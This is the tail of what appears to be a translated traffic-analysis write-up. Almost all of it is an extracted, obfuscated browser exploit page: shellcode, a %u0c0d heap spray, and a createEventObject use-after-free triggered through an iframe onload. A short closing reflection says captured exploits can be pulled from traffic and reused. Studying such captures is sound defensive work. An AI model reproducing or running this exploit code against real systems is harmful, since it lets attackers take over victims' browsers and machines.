%u7b5f%ufe4b%u7b8f%ua88b%u7bc5%u0ce3%u2fbd%u5316%u5c68%uc68b%u3592%u407f%ubbfa%ua6a6%u44a5%u368d%u929a%ubce8%u90ea%u7d18');
	var uafwHGfWUmxkIam = uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu("%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d");
	do {
		uafwHGfWUmxkIam += uafwHGfWUmxkIam
	} while (uafwHGfWUmxkIam.length < 0xd0000);
	for (S = 0; S < 150; S++) JsgdlqtHVnnWiFMCpdxJheQbdjITPhdkurJqwIMuMxJnHf[S] = uafwHGfWUmxkIam + mWgWGhyqOVxBPqtnAFWAyxhLnqBNaRNnkKvTfAwVuvOyCnGUwBPZEzSZtKpqGZUvPO;
}
function WisgEgTNEfaONekEqaMyAUALLMYW(cpznAZhGdtOhTCNSVGLRdYeEfCAPKMeztpQnoKTGKsjrhhkoxCWPz) {
	gGyfqFvCYPRmXbnUWzBrulnwZVAJpUifKDiAZEKOqNHrfziGDtUOBqjYCtATBhClJkXjezUcmxBlfEX();
	lTneQKOeMgwvXaqCPyQAaDDYAkd = document.createEventObject(cpznAZhGdtOhTCNSVGLRdYeEfCAPKMeztpQnoKTGKsjrhhkoxCWPz);
	document.getElementById("vhQYFCtoDnOzUOuxAflDSzVMIHYhjJojAOCHNZtQdlxSPFUeEthCGdRtiIY").innerHTML = "";
	window.setInterval(nayjNuSncnxGnhZDJrEXatSDkpo, 50);
}
function nayjNuSncnxGnhZDJrEXatSDkpo() {
	p = "\u0c0f\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
	for (i = 0; i < MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul.length; i++) {
		MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i].data = p;
	}
	var t = lTneQKOeMgwvXaqCPyQAaDDYAkd.srcElement;
}
</script>
</head>
<body>
<span id="vhQYFCtoDnOzUOuxAflDSzVMIHYhjJojAOCHNZtQdlxSPFUeEthCGdRtiIY"><iframe src="/infowTVeeGDYJWNfsrdrvXiYApnuPoCMjRrSZuKtbVgwuZCXwxKjtEclbPuJPPctcflhsttMRrSyxl.gif" onload="WisgEgTNEfaONekEqaMyAUALLMYW(event)" /></span>
</body>
</html>

6. END

Through this traffic analysis and sample extraction I learned how to capture someone else's attack and pull the key exploit out of their traffic. In this kind of capture-and-analyse setting it seems any encrypted exploit can be captured, then analysed and reused by the analyst. So an exploit should not be thrown around casually: you never know whether the other side has traffic monitoring switched on, waiting for you to attack.


